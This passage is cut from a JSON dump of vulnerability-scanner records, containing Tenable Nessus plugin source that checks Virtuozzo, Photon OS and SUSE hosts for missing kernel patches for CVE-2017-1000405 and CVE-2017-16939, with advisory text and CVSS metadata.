audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.18.2.vz7.15.2\",\n \"patch\",\"readykernel-patch-15.2-42.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.42.0.vz7.18.7\",\n \"patch\",\"readykernel-patch-18.7-42.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.42.0.vz7.20.18\",\n \"patch\",\"readykernel-patch-20.18-42.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:07:04", "description": "An update of the linux package has been released.", "edition": 17, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 2.0: Linux PHSA-2017-2.0-0008", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000407", "CVE-2017-1000405"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121792", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121792);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-1000407\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2017-2.0-0008\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000405\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-api-headers-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-oprofile-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.71-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:27:12", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-3225-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3225-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105072);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173225-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28062366\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-2006=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-2006=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:27:12", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3226-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-3226-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105073", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3226-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105073);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3226-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173226-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2dddb1e4\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-2007=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-2007=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-2007=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) 